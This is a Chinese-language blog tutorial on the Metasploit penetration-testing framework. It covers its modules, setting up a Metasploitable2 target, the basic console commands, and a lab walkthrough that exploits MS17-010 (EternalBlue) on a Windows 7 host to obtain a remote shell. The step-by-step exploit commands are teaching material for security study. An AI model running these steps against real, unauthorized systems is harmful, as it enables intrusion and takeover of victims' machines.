Metasploit(MSF)渗透测试框架使用教程及基本命令

最新推荐文章于 2024-04-20 18:51:25 发布
最新推荐文章于 2024-04-20 18:51:25 发布
阅读量3.8k 收藏 41
点赞数 5
文章标签: 渗透测试 网络安全 kali linux kali 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44433172/article/details/117394650
版权

第一章 Metasploit渗透框架介绍及体系框架

1.1 Metasploit 渗透测试框架介绍

  Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。使您能够查找,利用和验证漏洞。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台。

1.2 Metasploit 体系框架

在这里插入图片描述模块:模块组织按照不同的用途分为6种类型的模块
分为辅助模块(Aux)、渗透攻击模块(Exploits)、后渗透攻击模块(Post)、攻击载荷模块(payloads)、编码器模块(Encoders)、空指令模块(Nops)。

:后渗透攻击模块(Post):在渗透攻击模块拿到目标shell权限后,进行进一步攻击的叫做后渗透攻击模块。
:攻击载荷模块(payload):payload模块主要是用来建立目标机与攻击机稳定的连接。 通过攻击模块成功后利用payload可以返回一个shell,也可以进行程序注入等。

接口:msfconsole控制终端命令、msfcli命令行、msfgui图形化界面、armitage图形化界面以及msfapi远程调用接口

第二章 靶机搭建及Metasploit框架启动

2.1 Metasploitable2-Linux 靶机系统介绍

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计 作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。

2.2 Metasploitable2-Linux 靶机系统安装

Metasploitable2-Linux 靶机系统下载链接
1.下载完后直接解压缩到当前文件夹
在这里插入图片描述
2.打开Vmware后点击“打开虚拟机” ,如图:在这里插入图片描述
3.打开“Metasploitable.vmx”虚拟机文件
在这里插入图片描述
4.开启虚拟机
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
使用普通用户:msfadmin 密码:msfadmin 进行登录
进去系统后使用命令:

#sudu passwd root		//修改root管理员密码

修改root密码完成后使用命令:

#su root		//切换root账户

配置静态IP :

#vim /etc/network/interfaces		//修改网卡配置
------------------------------
#iface eth0 inet static
#address IP
#netmask 子网掩码
#gateway 网关
------------------------------

重启网卡配置:

#/etc/init.d/networking restart		//重启网卡配置

2.3 启动 Metasploit 框架

Metasploit 程序需要使用Postgresql数据库,Kali自带Postgresql数据库

Postgresql 概述:
Postgresql是世界上最先进的开源关系型数据库
官网:https://www.postgresql.org/

启动三项:
启动Postgresql 数据库命令:systemctl start postgresql
开机自启动Postgresql命令:systemctl enable postgresql
启动Metasploit框架命令:msfconsole
在这里插入图片描述
出现“ msf6 > ”证明Metasploit框架启用成功,现在可以进行操作了,可以参考命令文档进行操作。

第三章 Metasploit框架基本使用方法

3.1 帮助(help)

#help

Core Commands 核心命令
Module Commands 模块命令
Job Commands 后台任务命令
Resource Commands 资源脚本命令
Database Backend Commands 数据库后端命令
Credentials Backend Commands 证书凭证后端命令
Developer Commands 开发人员相关命令

3.2 连接(connect)

Connect 为核心命令。使用方法:

#connect 192.168.1.1 80  //连接192.168.1.1的80端口
#get /
-------------------------------
HTTP/1.1 400 Page not found
Server: GoAhead-Webs
Date: Tue Mar 30 22:15:02 2021
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
-------------------------------

3.3 列出(show)

show 命令列出所有渗透攻击模块。
show命令有效参数:all,encoders,exploits,payloads,auxiliary,post,plugins,info,options,targets

#show all   //列出所有渗透攻击模块

3.4 搜索(search)

search 命令:

#search mysql //搜索mysql相关漏洞模块
#search name:mysql //查找mysql漏洞模块
#search type:exploit //搜索exploit类型模块
#search cve:CVE-2017-8464 //搜索CVE漏洞
#search cve:2018 name:linux //搜索2018年linux漏洞模块

search表单含义:

Name Disclosure Date Rank Check Description
名称   披露日期   等级  检查   说明

Rank 通常用来描述漏洞级别,每个漏洞利用模块基于它们对目标系统的影响都被标记了一个Rank字段。

Rank 按照可靠性降序排列:

  1. great 该漏洞利用程序有一个默认的目标系统,并且可以自动检测适当的目标系统,或者在目标服务的版本检查之后可以返回到一个特定的返回地址;
  2. good 该漏洞利用程序有个默认的目标系统,并且是这种类型软件的“常见情况“(桌面应用程序的Windows 7,服务器的2012等);
  3. normal 该漏洞利用程序是可靠的,但是依赖于特定的版本,并且不能可靠地自动检测。
  4. average 该漏洞利用程序不可靠或难以利用;
  5. low 对于通用的平台而言该漏洞程序几乎不能利用(或者低于50%的利用成功率);
  6. manual 该漏洞利用程序不稳定或者难以利用并且基于拒绝服务(DOS);

3.5 使用(use)

命令:

#use 模块的Name  //调用装载该模块
#back  //退出当前调用的模块。
#info  //查看Rank等级、发布时间、可复现的目标系统
#run	 //执行exploit

第四章 模块整体使用流程

4.1 模块使用流程四步法

在这里插入图片描述

第一步 确定漏洞,已知漏洞,例:MS17-010;
第二步 查找模块,search MS17-010;
第三步 配置模块程序,use exploit、set payload、set 参数;
第四步 执行模块程序,exploit,run;

第五章 实战-使用msf渗透攻击Win7主机

5.1 第一步-确定目标及漏洞

目标:192.168.1.131
漏洞:MS17-010
目的:拿到最高权限,进行远程代码执行
在这里插入图片描述

在这里插入图片描述
用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。

5.2 第二步-查找验证模块并且调用

使用#msfconsole命令调用Metasploit框架,如图:
在这里插入图片描述

使用#search MS17-010命令,搜索查找MS17-010漏洞模块,如图:
在这里插入图片描述
这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。

#use auxiliary/scanner/smb/smb_ms17_010  //调用此模块

如图:
在这里插入图片描述

使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
在这里插入图片描述
使用#set RHOSTS 192.168.1.131 命令,设置目标地址。
在这里插入图片描述
最后使用#run命令去运行查看漏洞是否存在
在这里插入图片描述
Host is likely VULNERABLE to MS17-010! 这个主机存在MS17-010漏洞,可以去利用。
检测到该目标操作系统是Windows 7 专业版
接下来我们可以利用exploits模块进行渗透攻击。

5.3 第三步-利用exploist模块进行渗透

第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
先使用#back命令退出辅助模块,如图:
在这里插入图片描述
使用#search MS17-010命令,搜索MS17-010模块,如图:
在这里插入图片描述
我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。这里我们选择#2

#use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
使用#show options命令,查看需要设置的参数,如图:
在这里插入图片描述
这里我们看见多出一个payload选项,这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP

#set RHOSTS 192.168.1.131   //设置exploit,目标IP
#set LHOST 192.168.1.138  //设置payload

如图:
在这里插入图片描述
最后使用#run命令去运行exploit
在这里插入图片描述
显示192.168.1.138:4444 -> 192.168.1.131:49160 我们已经所渗透成功了,现在我们已经拿到目标机的Shell了。
我们可以使用#shell命令,在目标机打开一个shell。
在这里插入图片描述
如果显示乱码,用#chcp 65001命令,改成UTF-8代码页。
在这里插入图片描述

未完!

曲自清
关注
  • 5
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
如何在Android应用中安全地使用SQLite数据库,并通过SQLCipher进行加密保护
轻描时光
04-23 71
Android内置SQLite轻量级关系型数据库,可以在Android应用中存储、检索和管理结构化数据。SQLite是一个无服务器的、零配置的、事务性的SQL数据库引擎,非常适合用于移动设备和桌面应用程序中。:SQLite不需要单独的服务器进程或操作系统级别的配置。可以直接读写磁盘上的文件,非常高效且适合在资源有限的移动设备上使用。:SQLite支持ACID事务,提供了原子性、一致性、隔离性和持久性。保证了即使在发生故障的情况下,数据的完整性也能得到维护。
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
Metasploit使用教程(操作实例,meterpreter,msfconsole,msfcli,抓包)
qq_44111753的博客
12-13 5905
1、控制Metasploit终端(MSFCONSOLE) MSFCONSOLE主要用于管理Metasploit数据库,管理会话,配置并启动Matasploit模块 一些通用命令: help:该命令允许用户查看执行命令的帮助信息 use module:该命令允许用户加载选择的模块 set optionname module:该命令允许用户为模块设置不同的选项。 run:该命令用来启动一个非渗透攻击模块 search module:该命令允许用户搜索一个特定的模块 exit:退出MSFCONSOLE 操作步骤:
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-27 958
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令
Metasploit使用教程
Kali与编程
03-23 1783
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于实现对目标系统的控制。Metasploit支持多种不同的操作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
Metasploit 渗透测试框架(一)
m0_58001548的博客
03-23 680
目录一、Metasploit 渗透测试框架介绍1、Metasploit 体系框架2、Metasploit 目录结构二、Metasploit 基本使用方法1、核心命令中的 connect 命令2、模块相关的命令 show 使用方法 3、模块相关的命令 search 搜索的使用方法4、模块相关的命令 use 的使用方法5、模块相关的命令
Metasploit详细教程
Kali与编程
03-24 2120
Metasploit是一种功能强大的漏洞利用工具集,帮助用户测试网络安全并确认可能的漏洞。您可以从Metasploit官方网站下载适用于您操作系统的Metasploit框架。在成功启动Metasploit后,您需要查找目标设备并确定其IP地址、端口号和运行的服务。在选择漏洞后,您需要选择一个可用的模块以利用该漏洞。在选择了模块后,您需要设置所需的参数。该命令将扫描指定IP地址的所有开放端口,并识别运行的服务。该命令将列出所有与Apache相关的已知漏洞。该命令将显示所有可用选项,并允许您设置值。
Metasploit入门教程(非常详细)从零基础入门到精通,看完这一篇就够了!
m0_74131821的博客
05-27 2271
Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。Metasploit 适用于所有流行的操作系统,本文中,主要以Kali Linux为主。因为Kali Linux预装了 Metasploit框架和运行在框架上的其他第三方工具
【超详细】渗透测试平台Metasploit使用教程框架介绍、靶机安装、基本使用方法)
fly_enum的博客
12-22 1864
Metasploitframework,简称msfMetasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
【2023最新版】超详细Metasploit安装保姆级教程Metasploit渗透测试使用,看完这一篇就够了_
wangluoanquan111的博客
09-07 111
Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit,使用框架以及利用漏洞。
MSF使用教程
huangyongkang666的博客
03-26 9396
MSF使用教程 1.简介 ​ Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 2.MSF模块介绍 1.辅助模块 auxiliary 负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能 2.渗透攻击模块exploits 利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) ​ 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
metasploit中使用lnk漏洞渗透测试.doc
03-18
metasploit中使用lnk漏洞渗透测试.doc
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8175
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
安装SSL证书之后还会有不安全提示怎么办?
最新发布
JoySSL230907的博客
04-20 806
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
kali渗透进入msf
10-31
Kali是一个被广泛应用于渗透测试网络安全Linux发行版。而Metasploit Framework(MSF)是一个开源的渗透测试框架,它提供了一系列功能强大的工具和资源,帮助渗透测试人员实施攻击并评估系统的安全性。 在Kali中,可以使用Metasploit Framework来进行渗透测试,以测试目标系统的安全性。下面是进入MSF的步骤: 1. 打开终端:首先,在Kali Linux中打开一个终端窗口。你可以使用快捷键Ctrl+Alt+T来打开终端,或者在菜单中找到终端应用。 2. 启动MSF控制台:在终端中输入msfconsole并按下回车键,这将启动Metasploit Framework控制台。 3. 更新MSF:在控制台中,输入命令msfupdate并按下回车键,这将确保你使用的是最新的Metasploit Framework版本。 4. 选择攻击模块:通过输入命令use来选择你想要使用的攻击模块。例如,如果你想要使用一个特定的漏洞攻击模块,可以输入use exploit/[exploit_name]命令。 5. 设置攻击选项:根据选定的攻击模块,通过输入set命令来设置攻击选项。这些选项可能包括目标IP地址、端口等。 6. 运行攻击:通过输入命令exploit来运行已设置好的攻击。控制台将显示攻击的进展情况,并提供相关的反馈信息。 需要注意的是,在进行渗透测试时,务必遵循法律和道德规范,并且只能在授权范围内对系统进行测试。任何未经授权的攻击行为都是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值